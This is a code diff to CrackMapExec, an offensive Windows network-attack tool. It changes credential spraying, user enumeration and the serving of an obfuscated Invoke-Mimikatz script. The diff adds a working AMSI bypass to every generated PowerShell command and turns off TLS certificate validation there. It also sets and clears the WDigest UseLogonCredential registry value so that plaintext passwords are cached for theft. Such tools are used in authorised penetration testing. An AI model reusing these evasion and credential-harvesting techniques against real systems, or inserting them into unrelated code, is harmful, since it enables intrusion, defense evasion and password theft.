diff --git a/cme/connection.py b/cme/connection.py index b820d1f6..ea4bb077 100644 --- a/cme/connection.py +++ b/cme/connection.py @@ -211,10 +211,10 @@ class Connection: if not domain: domain = self.domain if self.args.domain: domain = self.args.domain - if credtype == 'hash' and not self.over_fail_limit(): + if credtype == 'hash' and not self.over_fail_limit(username): self.hash_login(domain, username, password) - elif credtype == 'plaintext' and not self.over_fail_limit(): + elif credtype == 'plaintext' and not self.over_fail_limit(username): self.plaintext_login(domain, username, password) except IndexError: diff --git a/cme/credentials/wdigest.py b/cme/credentials/wdigest.py index 32f45ca1..002441dc 100644 --- a/cme/credentials/wdigest.py +++ b/cme/credentials/wdigest.py @@ -22,7 +22,7 @@ class WDIGEST: ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] - rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, '\x01\x00') + rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00', rrp.REG_DWORD, 1) rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') @@ -46,15 +46,26 @@ class WDIGEST: ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest') keyHandle = ans['phkResult'] - rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00') + try: + rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00') + except: + self.logger.success('UseLogonCredential registry key not present') + + try: + remoteOps.finish() + except: + pass + + return try: #Check to make sure the reg key is actually deleted rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00') except DCERPCException: self.logger.success('UseLogonCredential registry key deleted successfully') + + try: + remoteOps.finish() + except: + pass - try: - remoteOps.finish() - except: - pass \ No newline at end of file diff --git a/cme/enum/users.py b/cme/enum/users.py index 863793ee..392c42ed 100644 --- a/cme/enum/users.py +++ b/cme/enum/users.py @@ -60,7 +60,7 @@ class SAMRDump: rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(self.__port) - if hasattr(rpctransport, setRemoteHost): + if hasattr(rpctransport, 'setRemoteHost'): rpctransport.setRemoteHost(self.__addr) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. diff --git a/cme/helpers.py b/cme/helpers.py index 058f7231..9f1d2b07 100644 --- a/cme/helpers.py +++ b/cme/helpers.py @@ -3,6 +3,7 @@ import string import re import cme import os +import logging from base64 import b64encode from termcolor import colored @@ -43,7 +44,15 @@ def obfs_ps_script(script, function_name=None): return strippedCode def create_ps_command(ps_command, force_ps32=False): - ps_command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + ps_command + ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; +try{{ +[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) +}}catch{{}} +{} +""".format(ps_command) + + logging.debug('Unincoded command:\n' + ps_command) + if force_ps32: command = """$command = '{}' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') diff --git a/cme/modules/mimikatz.py b/cme/modules/mimikatz.py index 2f9e8701..f6323c0e 100644 --- a/cme/modules/mimikatz.py +++ b/cme/modules/mimikatz.py @@ -55,7 +55,7 @@ class CMEModule: request.send_response(200) request.end_headers() - with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script: + with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script: ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) request.wfile.write(ps_script)